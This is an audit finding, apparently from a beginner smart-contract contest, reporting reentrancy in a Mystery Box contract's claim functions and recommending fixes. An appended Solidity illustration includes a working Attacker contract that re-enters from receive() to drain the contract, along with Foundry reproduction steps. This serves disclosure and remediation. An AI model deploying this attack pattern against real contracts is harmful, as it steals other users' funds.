Mystery Box

First Flight #25
Beginner Friendly
Foundry
100 EXP
Submission Details
Severity: high
Valid

Reentrancy Attack in Claim Functions

Summary

The claimSingleReward() and claimAllRewards() functions are vulnerable to reentrancy: both send Ether to the caller with an external call before the claimed reward is removed from the contract's internal state, so a malicious caller can re-enter and be paid for the same reward repeatedly.

Vulnerability Details

In both claimSingleReward() and claimAllRewards(), the contract transfers Ether to the caller before updating the state that records the reward as claimed:

(bool success,) = payable(msg.sender).call{value: value}("");

A low-level call forwards all remaining gas and hands control to the recipient. If msg.sender is a contract, its receive() or fallback() function runs at this point, while rewardsOwned still shows the reward as unclaimed. That function can call claimSingleReward() or claimAllRewards() again, and the nested call passes the same checks and sends the same value once more. The cycle repeats until the contract's balance can no longer cover the transfer; only then does the call stack unwind and each frame finally zero out the reward.

Impact

An attacker who owns a single reward can claim it many times in one transaction and drain the contract's entire Ether balance. Because that balance backs the rewards of every other user, those users lose their unclaimed rewards as well.

Tools Used

Manual code review

Recommendations

  • Follow the checks-effects-interactions pattern: zero the claimed reward in claimSingleReward() (and remove the caller's reward list in claimAllRewards()) before making the external call, so that a re-entrant caller finds nothing left to claim. This removes the root cause rather than just reducing its likelihood.
  • As defence in depth, additionally mark both claim functions nonReentrant using OpenZeppelin's ReentrancyGuard, so that any future external call added to these functions cannot reintroduce the problem.

rewardsOwned[msg.sender][_index].value = 0; // Update state first, then transfer
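The following is an added illustration of the ordering problem described in Vulnerability Details and of both recommendations; it is not the original submission's code nor the Mystery Box contract. The Reward struct, the grant() seeding helper, the contract names and the inline mutex (written out so the file compiles without an OpenZeppelin import) are assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Assumed shape of a reward entry (example only).
struct Reward {
    string name;
    uint256 value;
}

// Simplified reconstruction of the vulnerable pattern: interaction before effect.
contract VulnerableBox {
    mapping(address => Reward[]) public rewardsOwned;

    // Example-only helper: fund and record a reward for `to`.
    function grant(address to, uint256 value) external payable {
        require(msg.value == value, "fund the reward");
        rewardsOwned[to].push(Reward("Gold", value));
    }

    function claimSingleReward(uint256 _index) external {
        uint256 value = rewardsOwned[msg.sender][_index].value;
        require(value > 0, "No reward to claim");

        // External call first: the recipient's receive()/fallback() runs here
        // while rewardsOwned still records the reward as unclaimed.
        (bool success,) = payable(msg.sender).call{value: value}("");
        require(success, "Transfer failed");

        rewardsOwned[msg.sender][_index].value = 0; // too late
    }
}

// Attacker contract: re-enters from receive() until the box is empty.
contract Attacker {
    VulnerableBox private immutable box;
    uint256 private constant INDEX = 0; // index of the attacker's own reward

    constructor(VulnerableBox _box) { box = _box; }

    function attack() external {
        box.claimSingleReward(INDEX);
    }

    receive() external payable {
        // Keep claiming the same reward while the box can still pay it.
        if (address(box).balance >= msg.value) {
            box.claimSingleReward(INDEX);
        }
    }
}

// Hardened version: checks-effects-interactions plus a reentrancy mutex
// (minimal inline equivalent of OpenZeppelin's ReentrancyGuard).
contract HardenedBox {
    mapping(address => Reward[]) public rewardsOwned;
    uint256 private _status = 1; // 1 = not entered, 2 = entered

    modifier nonReentrant() {
        require(_status == 1, "reentrant call");
        _status = 2;
        _;
        _status = 1;
    }

    function grant(address to, uint256 value) external payable {
        require(msg.value == value, "fund the reward");
        rewardsOwned[to].push(Reward("Gold", value));
    }

    function claimSingleReward(uint256 _index) external nonReentrant {
        uint256 value = rewardsOwned[msg.sender][_index].value;
        require(value > 0, "No reward to claim");

        rewardsOwned[msg.sender][_index].value = 0; // effect before interaction

        (bool success,) = payable(msg.sender).call{value: value}("");
        require(success, "Transfer failed");
    }

    function claimAllRewards() external nonReentrant {
        Reward[] storage rewards = rewardsOwned[msg.sender];
        uint256 total;
        for (uint256 i = 0; i < rewards.length; i++) {
            total += rewards[i].value;
        }
        require(total > 0, "No rewards to claim");

        delete rewardsOwned[msg.sender]; // effect before interaction

        (bool success,) = payable(msg.sender).call{value: total}("");
        require(success, "Transfer failed");
    }
}
```

To reproduce in a Foundry test, deploy VulnerableBox, call grant() for a few victim addresses and once for the Attacker, then call attack(): each receive() re-entry is paid again before any frame reaches the zeroing line, and the attacker walks away with the whole balance. Against HardenedBox the nested call reverts, either on the mutex ("reentrant call") or, with the pattern fix alone, on "No reward to claim" because the reward was already zeroed; that failure propagates as success == false and the outer claim reverts, so the attacker receives nothing.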
Updates

Appeal created

inallhonesty Lead Judge 11 months ago
Submission Judgement Published
Validated
Assigned finding tags:

`claimAllRewards` reentrancy

`claimSingleReward` reentrancy
